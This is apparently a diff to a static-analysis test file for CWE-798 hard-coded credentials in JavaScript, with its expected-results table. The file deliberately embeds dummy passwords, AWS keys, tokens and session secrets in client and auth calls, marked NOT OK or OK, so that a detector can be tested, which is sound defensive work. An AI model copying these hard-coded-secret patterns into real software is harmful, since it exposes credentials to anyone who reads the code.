| HardcodedCredentials.js:15:36:15:50 | "user:abcdefgh" | HardcodedCredentials.js:15:36:15:50 | "user:abcdefgh" | HardcodedCredentials.js:15:36:15:50 | "user:abcdefgh" | The hard-coded value "user:abcdefgh" is used as $@. | HardcodedCredentials.js:15:36:15:50 | "user:abcdefgh" | credentials |
| HardcodedCredentials.js:16:37:16:51 | "user:abcdefgh" | HardcodedCredentials.js:16:37:16:51 | "user:abcdefgh" | HardcodedCredentials.js:16:37:16:51 | "user:abcdefgh" | The hard-coded value "user:abcdefgh" is used as $@. | HardcodedCredentials.js:16:37:16:51 | "user:abcdefgh" | credentials |
| HardcodedCredentials.js:18:16:18:30 | "user:abcdefgh" | HardcodedCredentials.js:18:16:18:30 | "user:abcdefgh" | HardcodedCredentials.js:20:36:20:51 | getCredentials() | The hard-coded value "user:abcdefgh" is used as $@. | HardcodedCredentials.js:20:36:20:51 | getCredentials() | credentials |
| HardcodedCredentials.js:27:25:27:31 | 'admin' | HardcodedCredentials.js:27:25:27:31 | 'admin' | HardcodedCredentials.js:27:25:27:31 | 'admin' | The hard-coded value "admin" is used as $@. | HardcodedCredentials.js:27:25:27:31 | 'admin' | user name |
| HardcodedCredentials.js:27:34:27:46 | 'supersecret' | HardcodedCredentials.js:27:34:27:46 | 'supersecret' | HardcodedCredentials.js:27:34:27:46 | 'supersecret' | The hard-coded value "supersecret" is used as $@. | HardcodedCredentials.js:27:34:27:46 | 'supersecret' | password |
| HardcodedCredentials.js:27:34:27:43 | 'abcdefgh' | HardcodedCredentials.js:27:34:27:43 | 'abcdefgh' | HardcodedCredentials.js:27:34:27:43 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:27:34:27:43 | 'abcdefgh' | password |
| HardcodedCredentials.js:29:11:29:30 | 'unknown-admin-name' | HardcodedCredentials.js:29:11:29:30 | 'unknown-admin-name' | HardcodedCredentials.js:29:11:29:30 | 'unknown-admin-name' | The hard-coded value "unknown-admin-name" is used as $@. | HardcodedCredentials.js:29:11:29:30 | 'unknown-admin-name' | user name |
| HardcodedCredentials.js:29:35:29:47 | 'supersecret' | HardcodedCredentials.js:29:35:29:47 | 'supersecret' | HardcodedCredentials.js:29:35:29:47 | 'supersecret' | The hard-coded value "supersecret" is used as $@. | HardcodedCredentials.js:29:35:29:47 | 'supersecret' | password |
| HardcodedCredentials.js:29:35:29:44 | 'abcdefgh' | HardcodedCredentials.js:29:35:29:44 | 'abcdefgh' | HardcodedCredentials.js:29:35:29:44 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:29:35:29:44 | 'abcdefgh' | password |
| HardcodedCredentials.js:35:15:35:24 | 'username' | HardcodedCredentials.js:35:15:35:24 | 'username' | HardcodedCredentials.js:35:15:35:24 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:35:15:35:24 | 'username' | user name |
| HardcodedCredentials.js:35:27:35:36 | 'password' | HardcodedCredentials.js:35:27:35:36 | 'password' | HardcodedCredentials.js:35:27:35:36 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:35:27:35:36 | 'password' | password |
| HardcodedCredentials.js:35:27:35:36 | 'abcdefgh' | HardcodedCredentials.js:35:27:35:36 | 'abcdefgh' | HardcodedCredentials.js:35:27:35:36 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:35:27:35:36 | 'abcdefgh' | password |
| HardcodedCredentials.js:41:38:41:47 | 'username' | HardcodedCredentials.js:41:38:41:47 | 'username' | HardcodedCredentials.js:41:38:41:47 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:41:38:41:47 | 'username' | user name |
| HardcodedCredentials.js:41:67:41:76 | 'password' | HardcodedCredentials.js:41:67:41:76 | 'password' | HardcodedCredentials.js:41:67:41:76 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:41:67:41:76 | 'password' | password |
| HardcodedCredentials.js:41:67:41:76 | 'abcdefgh' | HardcodedCredentials.js:41:67:41:76 | 'abcdefgh' | HardcodedCredentials.js:41:67:41:76 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:41:67:41:76 | 'abcdefgh' | password |
| HardcodedCredentials.js:42:35:42:44 | 'username' | HardcodedCredentials.js:42:35:42:44 | 'username' | HardcodedCredentials.js:42:35:42:44 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:42:35:42:44 | 'username' | user name |
| HardcodedCredentials.js:42:64:42:73 | 'password' | HardcodedCredentials.js:42:64:42:73 | 'password' | HardcodedCredentials.js:42:64:42:73 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:42:64:42:73 | 'password' | password |
| HardcodedCredentials.js:42:64:42:73 | 'abcdefgh' | HardcodedCredentials.js:42:64:42:73 | 'abcdefgh' | HardcodedCredentials.js:42:64:42:73 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:42:64:42:73 | 'abcdefgh' | password |
| HardcodedCredentials.js:44:34:44:43 | 'username' | HardcodedCredentials.js:44:34:44:43 | 'username' | HardcodedCredentials.js:44:34:44:43 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:44:34:44:43 | 'username' | user name |
| HardcodedCredentials.js:44:63:44:72 | 'password' | HardcodedCredentials.js:44:63:44:72 | 'password' | HardcodedCredentials.js:44:63:44:72 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:44:63:44:72 | 'password' | password |
| HardcodedCredentials.js:46:25:46:34 | 'password' | HardcodedCredentials.js:46:25:46:34 | 'password' | HardcodedCredentials.js:46:25:46:34 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:46:25:46:34 | 'password' | password |
| HardcodedCredentials.js:44:63:44:72 | 'abcdefgh' | HardcodedCredentials.js:44:63:44:72 | 'abcdefgh' | HardcodedCredentials.js:44:63:44:72 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:44:63:44:72 | 'abcdefgh' | password |
| HardcodedCredentials.js:46:25:46:34 | 'abcdefgh' | HardcodedCredentials.js:46:25:46:34 | 'abcdefgh' | HardcodedCredentials.js:46:25:46:34 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:46:25:46:34 | 'abcdefgh' | password |
| HardcodedCredentials.js:53:27:53:36 | 'username' | HardcodedCredentials.js:53:27:53:36 | 'username' | HardcodedCredentials.js:53:27:53:36 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:53:27:53:36 | 'username' | user name |
| HardcodedCredentials.js:53:39:53:48 | 'password' | HardcodedCredentials.js:53:39:53:48 | 'password' | HardcodedCredentials.js:53:39:53:48 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:53:39:53:48 | 'password' | password |
| HardcodedCredentials.js:53:39:53:48 | 'abcdefgh' | HardcodedCredentials.js:53:39:53:48 | 'abcdefgh' | HardcodedCredentials.js:53:39:53:48 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:53:39:53:48 | 'abcdefgh' | password |
| HardcodedCredentials.js:56:21:56:30 | 'username' | HardcodedCredentials.js:56:21:56:30 | 'username' | HardcodedCredentials.js:56:21:56:30 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:56:21:56:30 | 'username' | user name |
| HardcodedCredentials.js:57:21:57:30 | 'password' | HardcodedCredentials.js:57:21:57:30 | 'password' | HardcodedCredentials.js:57:21:57:30 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:57:21:57:30 | 'password' | password |
| HardcodedCredentials.js:57:21:57:30 | 'abcdefgh' | HardcodedCredentials.js:57:21:57:30 | 'abcdefgh' | HardcodedCredentials.js:57:21:57:30 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:57:21:57:30 | 'abcdefgh' | password |
| HardcodedCredentials.js:61:42:61:54 | 'bearerToken' | HardcodedCredentials.js:61:42:61:54 | 'bearerToken' | HardcodedCredentials.js:61:42:61:54 | 'bearerToken' | The hard-coded value "bearerToken" is used as $@. | HardcodedCredentials.js:61:42:61:54 | 'bearerToken' | token |
| HardcodedCredentials.js:65:23:65:35 | 'bearerToken' | HardcodedCredentials.js:65:23:65:35 | 'bearerToken' | HardcodedCredentials.js:65:23:65:35 | 'bearerToken' | The hard-coded value "bearerToken" is used as $@. | HardcodedCredentials.js:65:23:65:35 | 'bearerToken' | token |
| HardcodedCredentials.js:69:28:69:37 | 'username' | HardcodedCredentials.js:69:28:69:37 | 'username' | HardcodedCredentials.js:69:28:69:37 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:69:28:69:37 | 'username' | user name |
| HardcodedCredentials.js:69:40:69:49 | 'password' | HardcodedCredentials.js:69:40:69:49 | 'password' | HardcodedCredentials.js:69:40:69:49 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:69:40:69:49 | 'password' | password |
| HardcodedCredentials.js:69:40:69:49 | 'abcdefgh' | HardcodedCredentials.js:69:40:69:49 | 'abcdefgh' | HardcodedCredentials.js:69:40:69:49 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:69:40:69:49 | 'abcdefgh' | password |
| HardcodedCredentials.js:70:28:70:37 | 'username' | HardcodedCredentials.js:70:28:70:37 | 'username' | HardcodedCredentials.js:70:28:70:37 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:70:28:70:37 | 'username' | user name |
| HardcodedCredentials.js:70:40:70:49 | 'password' | HardcodedCredentials.js:70:40:70:49 | 'password' | HardcodedCredentials.js:70:40:70:49 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:70:40:70:49 | 'password' | password |
| HardcodedCredentials.js:70:40:70:49 | 'abcdefgh' | HardcodedCredentials.js:70:40:70:49 | 'abcdefgh' | HardcodedCredentials.js:70:40:70:49 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:70:40:70:49 | 'abcdefgh' | password |
| HardcodedCredentials.js:72:23:72:32 | 'username' | HardcodedCredentials.js:72:23:72:32 | 'username' | HardcodedCredentials.js:72:23:72:32 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:72:23:72:32 | 'username' | user name |
| HardcodedCredentials.js:72:35:72:44 | 'password' | HardcodedCredentials.js:72:35:72:44 | 'password' | HardcodedCredentials.js:72:35:72:44 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:72:35:72:44 | 'password' | password |
| HardcodedCredentials.js:72:35:72:44 | 'abcdefgh' | HardcodedCredentials.js:72:35:72:44 | 'abcdefgh' | HardcodedCredentials.js:72:35:72:44 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:72:35:72:44 | 'abcdefgh' | password |
| HardcodedCredentials.js:75:21:75:30 | 'username' | HardcodedCredentials.js:75:21:75:30 | 'username' | HardcodedCredentials.js:75:21:75:30 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:75:21:75:30 | 'username' | user name |
| HardcodedCredentials.js:76:21:76:30 | 'password' | HardcodedCredentials.js:76:21:76:30 | 'password' | HardcodedCredentials.js:76:21:76:30 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:76:21:76:30 | 'password' | password |
| HardcodedCredentials.js:76:21:76:30 | 'abcdefgh' | HardcodedCredentials.js:76:21:76:30 | 'abcdefgh' | HardcodedCredentials.js:76:21:76:30 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:76:21:76:30 | 'abcdefgh' | password |
| HardcodedCredentials.js:84:38:84:47 | 'username' | HardcodedCredentials.js:84:38:84:47 | 'username' | HardcodedCredentials.js:84:38:84:47 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:84:38:84:47 | 'username' | user name |
| HardcodedCredentials.js:84:50:84:59 | 'password' | HardcodedCredentials.js:84:50:84:59 | 'password' | HardcodedCredentials.js:84:50:84:59 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:84:50:84:59 | 'password' | password |
| HardcodedCredentials.js:84:50:84:59 | 'abcdefgh' | HardcodedCredentials.js:84:50:84:59 | 'abcdefgh' | HardcodedCredentials.js:84:50:84:59 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:84:50:84:59 | 'abcdefgh' | password |
| HardcodedCredentials.js:86:44:86:53 | 'username' | HardcodedCredentials.js:86:44:86:53 | 'username' | HardcodedCredentials.js:86:44:86:53 | 'username' | The hard-coded value "username" is used as $@. | HardcodedCredentials.js:86:44:86:53 | 'username' | user name |
| HardcodedCredentials.js:86:56:86:65 | 'password' | HardcodedCredentials.js:86:56:86:65 | 'password' | HardcodedCredentials.js:86:56:86:65 | 'password' | The hard-coded value "password" is used as $@. | HardcodedCredentials.js:86:56:86:65 | 'password' | password |
| HardcodedCredentials.js:86:56:86:65 | 'abcdefgh' | HardcodedCredentials.js:86:56:86:65 | 'abcdefgh' | HardcodedCredentials.js:86:56:86:65 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:86:56:86:65 | 'abcdefgh' | password |
| HardcodedCredentials.js:91:25:91:31 | 'TOKEN' | HardcodedCredentials.js:91:25:91:31 | 'TOKEN' | HardcodedCredentials.js:91:25:91:31 | 'TOKEN' | The hard-coded value "TOKEN" is used as $@. | HardcodedCredentials.js:91:25:91:31 | 'TOKEN' | token |
| HardcodedCredentials.js:98:18:98:21 | 'x1' | HardcodedCredentials.js:98:18:98:21 | 'x1' | HardcodedCredentials.js:98:18:98:21 | 'x1' | The hard-coded value "x1" is used as $@. | HardcodedCredentials.js:98:18:98:21 | 'x1' | user name |
| HardcodedCredentials.js:99:16:99:19 | 'x2' | HardcodedCredentials.js:99:16:99:19 | 'x2' | HardcodedCredentials.js:99:16:99:19 | 'x2' | The hard-coded value "x2" is used as $@. | HardcodedCredentials.js:99:16:99:19 | 'x2' | user name |
| HardcodedCredentials.js:100:25:100:28 | 'x3' | HardcodedCredentials.js:100:25:100:28 | 'x3' | HardcodedCredentials.js:100:25:100:28 | 'x3' | The hard-coded value "x3" is used as $@. | HardcodedCredentials.js:100:25:100:28 | 'x3' | user name |
| HardcodedCredentials.js:101:19:101:22 | 'x4' | HardcodedCredentials.js:101:19:101:22 | 'x4' | HardcodedCredentials.js:101:19:101:22 | 'x4' | The hard-coded value "x4" is used as $@. | HardcodedCredentials.js:101:19:101:22 | 'x4' | user name |
| HardcodedCredentials.js:102:14:102:17 | 'y1' | HardcodedCredentials.js:102:14:102:17 | 'y1' | HardcodedCredentials.js:102:14:102:17 | 'y1' | The hard-coded value "y1" is used as $@. | HardcodedCredentials.js:102:14:102:17 | 'y1' | password |
| HardcodedCredentials.js:103:17:103:20 | 'y2' | HardcodedCredentials.js:103:17:103:20 | 'y2' | HardcodedCredentials.js:103:17:103:20 | 'y2' | The hard-coded value "y2" is used as $@. | HardcodedCredentials.js:103:17:103:20 | 'y2' | password |
| HardcodedCredentials.js:104:27:104:30 | 'y3' | HardcodedCredentials.js:104:27:104:30 | 'y3' | HardcodedCredentials.js:104:27:104:30 | 'y3' | The hard-coded value "y3" is used as $@. | HardcodedCredentials.js:104:27:104:30 | 'y3' | password |
| HardcodedCredentials.js:105:19:105:22 | 'y4' | HardcodedCredentials.js:105:19:105:22 | 'y4' | HardcodedCredentials.js:105:19:105:22 | 'y4' | The hard-coded value "y4" is used as $@. | HardcodedCredentials.js:105:19:105:22 | 'y4' | password |
| HardcodedCredentials.js:106:16:106:19 | 'z1' | HardcodedCredentials.js:106:16:106:19 | 'z1' | HardcodedCredentials.js:106:16:106:19 | 'z1' | The hard-coded value "z1" is used as $@. | HardcodedCredentials.js:106:16:106:19 | 'z1' | token |
| HardcodedCredentials.js:102:14:102:23 | 'abcdefgh' | HardcodedCredentials.js:102:14:102:23 | 'abcdefgh' | HardcodedCredentials.js:102:14:102:23 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:102:14:102:23 | 'abcdefgh' | password |
| HardcodedCredentials.js:103:17:103:26 | 'abcdefgh' | HardcodedCredentials.js:103:17:103:26 | 'abcdefgh' | HardcodedCredentials.js:103:17:103:26 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:103:17:103:26 | 'abcdefgh' | password |
| HardcodedCredentials.js:104:27:104:36 | 'abcdefgh' | HardcodedCredentials.js:104:27:104:36 | 'abcdefgh' | HardcodedCredentials.js:104:27:104:36 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:104:27:104:36 | 'abcdefgh' | password |
| HardcodedCredentials.js:105:19:105:28 | 'abcdefgh' | HardcodedCredentials.js:105:19:105:28 | 'abcdefgh' | HardcodedCredentials.js:105:19:105:28 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:105:19:105:28 | 'abcdefgh' | password |
| HardcodedCredentials.js:106:16:106:25 | 'abcdefgh' | HardcodedCredentials.js:106:16:106:25 | 'abcdefgh' | HardcodedCredentials.js:106:16:106:25 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:106:16:106:25 | 'abcdefgh' | token |
| HardcodedCredentials.js:112:19:112:22 | 'x5' | HardcodedCredentials.js:112:19:112:22 | 'x5' | HardcodedCredentials.js:112:19:112:22 | 'x5' | The hard-coded value "x5" is used as $@. | HardcodedCredentials.js:112:19:112:22 | 'x5' | user name |
| HardcodedCredentials.js:113:19:113:22 | 'y5' | HardcodedCredentials.js:113:19:113:22 | 'y5' | HardcodedCredentials.js:113:19:113:22 | 'y5' | The hard-coded value "y5" is used as $@. | HardcodedCredentials.js:113:19:113:22 | 'y5' | password |
| HardcodedCredentials.js:130:44:130:58 | 'crypto secret' | HardcodedCredentials.js:130:44:130:58 | 'crypto secret' | HardcodedCredentials.js:130:44:130:58 | 'crypto secret' | The hard-coded value "crypto secret" is used as $@. | HardcodedCredentials.js:130:44:130:58 | 'crypto secret' | key |
| HardcodedCredentials.js:131:52:131:73 | 'crypto ... secret' | HardcodedCredentials.js:131:52:131:73 | 'crypto ... secret' | HardcodedCredentials.js:131:52:131:73 | 'crypto ... secret' | The hard-coded value "crypto-js/aes secret" is used as $@. | HardcodedCredentials.js:131:52:131:73 | 'crypto ... secret' | key |
| HardcodedCredentials.js:135:41:135:63 | "cookie ... secret" | HardcodedCredentials.js:135:41:135:63 | "cookie ... secret" | HardcodedCredentials.js:135:41:135:63 | "cookie ... secret" | The hard-coded value "cookie-session secret" is used as $@. | HardcodedCredentials.js:135:41:135:63 | "cookie ... secret" | key |
| HardcodedCredentials.js:113:19:113:28 | 'abcdefgh' | HardcodedCredentials.js:113:19:113:28 | 'abcdefgh' | HardcodedCredentials.js:113:19:113:28 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:113:19:113:28 | 'abcdefgh' | password |
| HardcodedCredentials.js:130:44:130:53 | 'abcdefgh' | HardcodedCredentials.js:130:44:130:53 | 'abcdefgh' | HardcodedCredentials.js:130:44:130:53 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:130:44:130:53 | 'abcdefgh' | key |
| HardcodedCredentials.js:131:52:131:61 | 'abcdefgh' | HardcodedCredentials.js:131:52:131:61 | 'abcdefgh' | HardcodedCredentials.js:131:52:131:61 | 'abcdefgh' | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:131:52:131:61 | 'abcdefgh' | key |
| HardcodedCredentials.js:135:41:135:50 | "abcdefgh" | HardcodedCredentials.js:135:41:135:50 | "abcdefgh" | HardcodedCredentials.js:135:41:135:50 | "abcdefgh" | The hard-coded value "abcdefgh" is used as $@. | HardcodedCredentials.js:135:41:135:50 | "abcdefgh" | key |
| HardcodedCredentials.js:160:38:160:48 | "change_me" | HardcodedCredentials.js:160:38:160:48 | "change_me" | HardcodedCredentials.js:160:38:160:48 | "change_me" | The hard-coded value "change_me" is used as $@. | HardcodedCredentials.js:160:38:160:48 | "change_me" | key |
| HardcodedCredentials.js:161:41:161:51 | 'change_me' | HardcodedCredentials.js:161:41:161:51 | 'change_me' | HardcodedCredentials.js:161:41:161:51 | 'change_me' | The hard-coded value "change_me" is used as $@. | HardcodedCredentials.js:161:41:161:51 | 'change_me' | key |

68
javascript/ql/test/query-tests/Security/CWE-798/HardcodedCredentials.js
View File

@@ -5,17 +5,17 @@
user: 'dbuser',
host: 'database.server.com',
database: 'mydb',
password: 'secretpassword',
password: 'abcdefgh',
port: 3211,
}); // NOT OK
client.connect();
})();
(function() {
require("http").request({auth: "user:password"}); // NOT OK
require("https").request({auth: "user:password"}); // NOT OK
require("http").request({auth: "user:abcdefgh"}); // NOT OK
require("https").request({auth: "user:abcdefgh"}); // NOT OK
function getCredentials() {
return "user:password";
return "user:abcdefgh";
}
require("http").request({auth: getCredentials()}); // NOT OK
require("http").request({auth: getUnknownCredentials()}); // OK
@@ -24,37 +24,37 @@
(function() {
var basicAuth = require('express-basic-auth');
basicAuth({users: { 'admin': 'supersecret' }}); // NOT OK
basicAuth({users: { 'admin': 'abcdefgh' }}); // NOT OK
var users = {};
users['unknown-admin-name'] = 'supersecret';
users['unknown-admin-name'] = 'abcdefgh';
basicAuth({users: users}) // NOT OK
})();
(function() {
var basicAuth = require('basic-auth-connect');
basicAuth('username', 'password'); // NOT OK
basicAuth('username', 'abcdefgh'); // NOT OK
basicAuth(function(){}); // OK
})();
(function() {
var AWS = require('aws-sdk');
AWS.config.update({ accessKeyId: 'username', secretAccessKey: 'password'}); // NOT OK
new AWS.Config({ accessKeyId: 'username', secretAccessKey: 'password'}); // NOT OK
AWS.config.update({ accessKeyId: 'username', secretAccessKey: 'abcdefgh'}); // NOT OK
new AWS.Config({ accessKeyId: 'username', secretAccessKey: 'abcdefgh'}); // NOT OK
var config = new AWS.Config();
config.update({ accessKeyId: 'username', secretAccessKey: 'password'}); // NOT OK
config.update({ accessKeyId: 'username', secretAccessKey: 'abcdefgh'}); // NOT OK
var o = {};
o.secretAccessKey = 'password';
o.secretAccessKey = 'abcdefgh';
config.update(o); // NOT OK
})();
(function() {
var request = require('request');
request.get(url).auth('username', 'password'); // NOT OK
request.get(url).auth('username', 'abcdefgh'); // NOT OK
request.get(url, { // NOT OK
'auth': {
'user': 'username',
'pass': 'password'
'pass': 'abcdefgh'
}
});
@@ -66,14 +66,14 @@
}
});
request.post(url).auth('username', 'password'); // NOT OK
request.head(url).auth('username', 'password'); // NOT OK
request.post(url).auth('username', 'abcdefgh'); // NOT OK
request.head(url).auth('username', 'abcdefgh'); // NOT OK
request(url).auth('username', 'password'); // NOT OK
request(url).auth('username', 'abcdefgh'); // NOT OK
request(url, { // NOT OK
'auth': {
'user': 'username',
'pass': 'password'
'pass': 'abcdefgh'
}
});
})();
@@ -81,9 +81,9 @@
(function() {
const MsRest = require('ms-rest-azure');
MsRest.loginWithUsernamePassword('username', 'password', function(){}); // NOT OK
MsRest.loginWithUsernamePassword('username', 'abcdefgh', function(){}); // NOT OK
MsRest.loginWithUsernamePassword(process.env.AZURE_USER, process.env.AZURE_PASS, function(){}); // OK
MsRest.loginWithServicePrincipalSecret('username', 'password', function(){}); // NOT OK
MsRest.loginWithServicePrincipalSecret('username', 'abcdefgh', function(){}); // NOT OK
})();
(function() {
@@ -99,26 +99,26 @@
keyId: 'x2',
storageAccount: 'x3',
username: 'x4',
key: 'y1',
apiKey: 'y2',
storageAccessKey: 'y3',
password: 'y4',
token: 'z1'
key: 'abcdefgh',
apiKey: 'abcdefgh',
storageAccessKey: 'abcdefgh',
password: 'abcdefgh',
token: 'abcdefgh'
});
pkgcloud.compute.createClient({ // OK
INNOCENT_DATA: '42'
});
pkgcloud.providers.SOME_PROVIDER.compute.createClient({ // NOT OK
username: 'x5',
password: 'y5'
password: 'abcdefgh'
});
pkgcloud.UNKNOWN_SERVICE.createClient({ // OK
username: 'x6',
password: 'y6'
password: 'abcdefgh'
});
pkgcloud.providers.SOME_PROVIDER.UNKNOWN_SERVICE.createClient({ // OK
username: 'x7',
password: 'y7'
password: 'abcdefgh'
});
pkgcloud.compute.createClient({ // OK
username: process.env.USERNAME,
@@ -127,12 +127,12 @@
})();
(function(){
require('crypto').createHmac('sha256', 'crypto secret');
require("crypto-js/aes").encrypt('my message', 'crypto-js/aes secret');
require('crypto').createHmac('sha256', 'abcdefgh');
require("crypto-js/aes").encrypt('my message', 'abcdefgh');
})()
(function(){
require("cookie-session")({ secret: "cookie-session secret" });
require("cookie-session")({ secret: "abcdefgh" });
})()
(function(){
@@ -155,3 +155,11 @@
}
});
})();
(function(){
require("cookie-session")({ secret: "change_me" }); // NOT OK
require('crypto').createHmac('sha256', 'change_me'); // NOT OK
var basicAuth = require('express-basic-auth');
basicAuth({users: { [adminName]: 'change_me' }}); // OK
})();